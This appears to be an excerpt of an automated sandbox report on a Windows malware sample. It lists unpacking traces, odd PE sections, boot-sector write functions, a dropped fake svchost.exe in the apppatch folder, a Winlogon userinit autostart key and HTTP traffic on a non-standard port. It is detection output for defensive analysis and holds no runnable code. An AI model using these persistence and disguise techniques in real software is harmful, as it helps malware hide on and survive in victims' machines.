    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeUnpacked PE file: 19.2.cUKxeliGgCix.exe.2910000.2.unpack
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeUnpacked PE file: 23.2.cUKxeliGgCix.exe.3200000.2.unpack
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeUnpacked PE file: 27.2.cUKxeliGgCix.exe.1590000.2.unpack
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeUnpacked PE file: 31.2.cUKxeliGgCix.exe.1040000.2.unpack
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeUnpacked PE file: 37.2.cUKxeliGgCix.exe.3140000.2.unpack
    Detected unpacking (overwrites its own PE header)
    Source: C:\Users\user\Desktop\5AFlyarMds.exeUnpacked PE file: 0.2.5AFlyarMds.exe.400000.1.unpack
    Source: C:\Windows\apppatch\svchost.exeUnpacked PE file: 1.2.svchost.exe.400000.0.unpack
    Source: C:\Users\user\Desktop\5AFlyarMds.exeCode function: 0_2_004020E0 memset,SHGetFolderPathA,PathAppendA,SetCurrentDirectoryA,LoadLibraryA,GetProcAddress,FreeLibrary,0_2_004020E0
    Source: svchost.exe.0.drStatic PE information: real checksum: 0x2df4d8a0 should be: 0x364c1
    Source: 5AFlyarMds.exeStatic PE information: real checksum: 0x25b98898 should be: 0x364c1
    Source: 5AFlyarMds.exeStatic PE information: section name: .lm
    Source: 5AFlyarMds.exeStatic PE information: section name: .qaQL
    Source: 5AFlyarMds.exeStatic PE information: section name: .yP
    Source: 5AFlyarMds.exeStatic PE information: section name: .bPUeWG
    Source: 5AFlyarMds.exeStatic PE information: section name: .PaB
    Source: 5AFlyarMds.exeStatic PE information: section name: .dOh
    Source: 5AFlyarMds.exeStatic PE information: section name: .HvNW
    Source: 5AFlyarMds.exeStatic PE information: section name: .pPJb
    Source: 5AFlyarMds.exeStatic PE information: section name: .bBut
    Source: svchost.exe.0.drStatic PE information: section name: .lm
    Source: svchost.exe.0.drStatic PE information: section name: .qaQL
    Source: svchost.exe.0.drStatic PE information: section name: .yP
    Source: svchost.exe.0.drStatic PE information: section name: .bPUeWG
    Source: svchost.exe.0.drStatic PE information: section name: .PaB
    Source: svchost.exe.0.drStatic PE information: section name: .dOh
    Source: svchost.exe.0.drStatic PE information: section name: .HvNW
    Source: svchost.exe.0.drStatic PE information: section name: .pPJb
    Source: svchost.exe.0.drStatic PE information: section name: .bBut
    Source: C:\Users\user\Desktop\5AFlyarMds.exeCode function: 0_2_0044B1E0 push eax; ret 0_2_0044B20E
    Source: C:\Users\user\Desktop\5AFlyarMds.exeCode function: 0_2_02120179 push edi; iretd 0_2_0212017A
    Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_0044B1E0 push eax; ret 1_2_0044B20E
    Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_02CD8B69 push cs; iretd 1_2_02CD8B78
    Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_02CD8B33 push cs; ret 1_2_02CD8B48
    Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_02CD849D push es; iretd 1_2_02CD84AC
    Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_02CD4DE0 push eax; ret 1_2_02CD4E0E
    Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_029F61E0 push eax; ret 1_2_029F620E
    Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_02B30179 push edi; iretd 1_2_02B3017A
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 5_2_02FA8B69 push cs; iretd 5_2_02FA8B78
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 5_2_02FA8B33 push cs; ret 5_2_02FA8B48
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 5_2_02FA849D push es; iretd 5_2_02FA84AC
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 5_2_02FA4DE0 push eax; ret 5_2_02FA4E0E
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 5_2_016261E0 push eax; ret 5_2_0162620E
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 5_2_016168D2 push ebp; retf 5_2_016168D3
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 5_2_01626895 push cs; retf 0004h5_2_016268F5
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 5_2_0162989D push es; iretd 5_2_016298AC
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 5_2_0162656A push eax; ret 5_2_0162656D
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 5_2_01626576 push ss; ret 5_2_01626579
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 5_2_0160CD5C push ebp; retf 5_2_0160CD5D
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 5_2_0162655E pushad ; ret 5_2_01626569
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 5_2_0161664C push ebp; retf 5_2_0161664D
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 6_2_02598B69 push cs; iretd 6_2_02598B78
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 6_2_02598B33 push cs; ret 6_2_02598B48
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 6_2_0259849D push es; iretd 6_2_025984AC
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 6_2_02594DE0 push eax; ret 6_2_02594E0E
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 6_2_024268D2 push ebp; retf 6_2_024268D3
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 6_2_02436895 push cs; retf 0004h6_2_024368F5
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 6_2_0243989D push es; iretd 6_2_024398AC
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 6_2_024361E0 push eax; ret 6_2_0243620E
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 6_2_0242664C push ebp; retf 6_2_0242664D

    Persistence and Installation Behavior

    barindex
    Contains functionality to infect the boot sector
    Source: C:\Windows\apppatch\svchost.exeCode function: memset,GetDriveTypeA,SetCurrentDirectoryA,_snprintf,CreateFileA,lstrcpynA,SetFilePointer,SetFilePointer,LockFile,WriteFile,UnlockFile,GetHandleInformation,CloseHandle, \\.\PhysicalDrive%u1_2_02CA33F0
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: memset,GetDriveTypeA,SetCurrentDirectoryA,_snprintf,CreateFileA,SetFilePointer,SetFilePointer,LockFile,WriteFile,UnlockFile,GetHandleInformation,CloseHandle, \\.\PhysicalDrive%u5_2_02F733F0
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: memset,GetDriveTypeA,SetCurrentDirectoryA,_snprintf,CreateFileA,SetFilePointer,SetFilePointer,LockFile,WriteFile,UnlockFile,GetHandleInformation,CloseHandle, \\.\PhysicalDrive%u6_2_025633F0
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: memset,GetDriveTypeA,SetCurrentDirectoryA,_snprintf,CreateFileA,SetFilePointer,SetFilePointer,LockFile,WriteFile,UnlockFile,GetHandleInformation,CloseHandle, \\.\PhysicalDrive%u8_2_025D33F0
    Drops PE files with benign system names
    Source: C:\Users\user\Desktop\5AFlyarMds.exeFile created: C:\Windows\apppatch\svchost.exeJump to dropped file
    Drops executables to the windows directory (C:\Windows) and starts them
    Source: C:\Users\user\Desktop\5AFlyarMds.exeExecutable created and started: C:\Windows\apppatch\svchost.exeJump to behavior
    Source: C:\Users\user\Desktop\5AFlyarMds.exeCode function: API: WriteFile string: \\?\globalroot\systemroot\system32\tasks\0_2_00403560
    Source: C:\Users\user\Desktop\5AFlyarMds.exeFile created: C:\Windows\apppatch\svchost.exeJump to dropped file
    Source: C:\Users\user\Desktop\5AFlyarMds.exeFile created: C:\Windows\apppatch\svchost.exeJump to dropped file

    Boot Survival

    barindex
    Contains functionality to infect the boot sector
    Source: C:\Windows\apppatch\svchost.exeCode function: memset,GetDriveTypeA,SetCurrentDirectoryA,_snprintf,CreateFileA,lstrcpynA,SetFilePointer,SetFilePointer,LockFile,WriteFile,UnlockFile,GetHandleInformation,CloseHandle, \\.\PhysicalDrive%u1_2_02CA33F0
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: memset,GetDriveTypeA,SetCurrentDirectoryA,_snprintf,CreateFileA,SetFilePointer,SetFilePointer,LockFile,WriteFile,UnlockFile,GetHandleInformation,CloseHandle, \\.\PhysicalDrive%u5_2_02F733F0
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: memset,GetDriveTypeA,SetCurrentDirectoryA,_snprintf,CreateFileA,SetFilePointer,SetFilePointer,LockFile,WriteFile,UnlockFile,GetHandleInformation,CloseHandle, \\.\PhysicalDrive%u6_2_025633F0
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: memset,GetDriveTypeA,SetCurrentDirectoryA,_snprintf,CreateFileA,SetFilePointer,SetFilePointer,LockFile,WriteFile,UnlockFile,GetHandleInformation,CloseHandle, \\.\PhysicalDrive%u8_2_025D33F0
    Creates an undocumented autostart registry key
    Source: C:\Windows\apppatch\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon userinitJump to behavior
    Monitors registry run keys for changes
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeRegistry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunJump to behavior
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeRegistry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunJump to behavior
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeRegistry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunJump to behavior
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeRegistry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeRegistry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeRegistry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeRegistry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeRegistry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeRegistry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeRegistry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeRegistry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeRegistry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeRegistry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeRegistry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeRegistry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeRegistry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

    Hooking and other Techniques for Hiding and Protection

    barindex
    Moves itself to temp directory
    Source: c:\users\user\desktop\5aflyarmds.exeFile moved: C:\Users\user\AppData\Local\Temp\D4B2.tmpJump to behavior
    Uses known network protocols on non-standard ports
    Source: unknownNetwork traffic detected: HTTP traffic on port 55362 -> 8001
    Source: unknownNetwork traffic detected: HTTP traffic on port 55378 -> 8001
    Source: unknownNetwork traffic detected: HTTP traffic on port 8001 -> 55378
    Source: unknownNetwork traffic detected: HTTP traffic on port 54058 -> 8001
    Source: unknownNetwork traffic detected: HTTP traffic on port 8001 -> 54058
    Source: unknownNetwork traffic detected: HTTP traffic on port 54058 -> 8001
    Source: unknownNetwork traffic detected: HTTP traffic on port 8001 -> 54058
    Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_02C9D300 GetWindowLongA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetDlgItem,GetWindowLongA,SetWindowTextA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetDlgItem,GetClassLongA,SetClassLongA,SendMessageA,SendMessageA,GetObjectA,CreateFontIndirectA,SendMessageA,GetWindow,GetWindow,GetWindow,GetWindowInfo,GetWindowRect,SetWindowPos,GetClientRect,MoveWindow,CreateWindowExA,SetWindowLongA,GetClassLongA,SetClassLongA,GetWindowTextLengthA,HeapAlloc,SetWindowLongA,SendMessageA,GetWindowThreadProcessId,GetClassLongA,GetClassLongA,GetClassLongA,LoadIconA,SendMessageA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetWindow,IsIconic,ShowWindow,WaitForSingleObject,ReleaseMutex,PostMessageA,GetDlgItem,GetWindowLongA,WaitForSingleObject,ReleaseMutex,GetDlgItem,GetWindowLongA,DeleteObject,HeapFree,DestroyWindow,EndDialog,1_2_02C9D300
    Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_02C99ED0 IsWindow,IsWindowVisible,IsIconic,GetLastActivePopup,1_2_02C99ED0
    Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_02C9CFE9 IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,1_2_02C9CFE9
    Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_02C9CFE9 IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,1_2_02C9CFE9
    Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_02C9CDC0 ReleaseMutex,GetWindow,WaitForSingleObject,GetWindow,IsWindow,GetWindow,IsIconic,GetWindow,GetWindowInfo,GetWindowInfo,GetWindow,GetAncestor,GetWindow,GetWindow,IsWindow,GetWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,1_2_02C9CDC0
    Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_02C9CDC0 ReleaseMutex,GetWindow,WaitForSingleObject,GetWindow,IsWindow,GetWindow,IsIconic,GetWindow,GetWindowInfo,GetWindowInfo,GetWindow,GetAncestor,GetWindow,GetWindow,IsWindow,GetWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,1_2_02C9CDC0
    Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_02C9CDC0 ReleaseMutex,GetWindow,WaitForSingleObject,GetWindow,IsWindow,GetWindow,IsIconic,GetWindow,GetWindowInfo,GetWindowInfo,GetWindow,GetAncestor,GetWindow,GetWindow,IsWindow,GetWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,1_2_02C9CDC0
    Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_02C9CDC0 ReleaseMutex,GetWindow,WaitForSingleObject,GetWindow,IsWindow,GetWindow,IsIconic,GetWindow,GetWindowInfo,GetWindowInfo,GetWindow,GetAncestor,GetWindow,GetWindow,IsWindow,GetWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,1_2_02C9CDC0
    Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_02C9CD50 IsWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,1_2_02C9CD50
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 5_2_02F6D300 GetWindowLongA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetDlgItem,GetWindowLongA,SetWindowTextA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetDlgItem,GetClassLongA,SetClassLongA,SendMessageA,SendMessageA,GetObjectA,CreateFontIndirectA,SendMessageA,GetWindow,GetWindow,GetWindow,GetWindowInfo,GetWindowRect,SetWindowPos,GetClientRect,MoveWindow,CreateWindowExA,SetWindowLongA,GetClassLongA,SetClassLongA,GetWindowTextLengthA,HeapAlloc,SetWindowLongA,SendMessageA,GetWindowThreadProcessId,GetClassLongA,GetClassLongA,GetClassLongA,LoadIconA,SendMessageA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetWindow,IsIconic,ShowWindow,WaitForSingleObject,ReleaseMutex,PostMessageA,GetDlgItem,GetWindowLongA,WaitForSingleObject,ReleaseMutex,GetDlgItem,GetWindowLongA,DeleteObject,HeapFree,DestroyWindow,EndDialog,5_2_02F6D300
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 5_2_02F69ED0 IsWindow,IsWindowVisible,IsIconic,GetLastActivePopup,5_2_02F69ED0
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 5_2_02F6CFE9 IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,5_2_02F6CFE9
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 5_2_02F6CFE9 IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,5_2_02F6CFE9
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 5_2_02F6CDC0 ReleaseMutex,GetWindow,WaitForSingleObject,GetWindow,IsWindow,GetWindow,IsIconic,GetWindow,GetWindowInfo,GetWindowInfo,GetWindow,GetAncestor,GetWindow,GetWindow,IsWindow,GetWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,5_2_02F6CDC0
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 5_2_02F6CDC0 ReleaseMutex,GetWindow,WaitForSingleObject,GetWindow,IsWindow,GetWindow,IsIconic,GetWindow,GetWindowInfo,GetWindowInfo,GetWindow,GetAncestor,GetWindow,GetWindow,IsWindow,GetWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,5_2_02F6CDC0
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 5_2_02F6CDC0 ReleaseMutex,GetWindow,WaitForSingleObject,GetWindow,IsWindow,GetWindow,IsIconic,GetWindow,GetWindowInfo,GetWindowInfo,GetWindow,GetAncestor,GetWindow,GetWindow,IsWindow,GetWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,5_2_02F6CDC0
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 5_2_02F6CDC0 ReleaseMutex,GetWindow,WaitForSingleObject,GetWindow,IsWindow,GetWindow,IsIconic,GetWindow,GetWindowInfo,GetWindowInfo,GetWindow,GetAncestor,GetWindow,GetWindow,IsWindow,GetWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,5_2_02F6CDC0
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 5_2_02F6CD50 IsWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,5_2_02F6CD50
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 6_2_0255D300 GetWindowLongA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetDlgItem,GetWindowLongA,SetWindowTextA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetDlgItem,GetClassLongA,SetClassLongA,SendMessageA,SendMessageA,GetObjectA,CreateFontIndirectA,SendMessageA,GetWindow,GetWindow,GetWindow,GetWindowInfo,GetWindowRect,SetWindowPos,GetClientRect,MoveWindow,CreateWindowExA,SetWindowLongA,GetClassLongA,SetClassLongA,GetWindowTextLengthA,HeapAlloc,SetWindowLongA,SendMessageA,GetWindowThreadProcessId,GetClassLongA,GetClassLongA,GetClassLongA,LoadIconA,SendMessageA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetWindow,IsIconic,ShowWindow,WaitForSingleObject,ReleaseMutex,PostMessageA,GetDlgItem,GetWindowLongA,WaitForSingleObject,ReleaseMutex,GetDlgItem,GetWindowLongA,DeleteObject,HeapFree,DestroyWindow,EndDialog,6_2_0255D300
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 6_2_02559ED0 IsWindow,IsWindowVisible,IsIconic,GetLastActivePopup,6_2_02559ED0
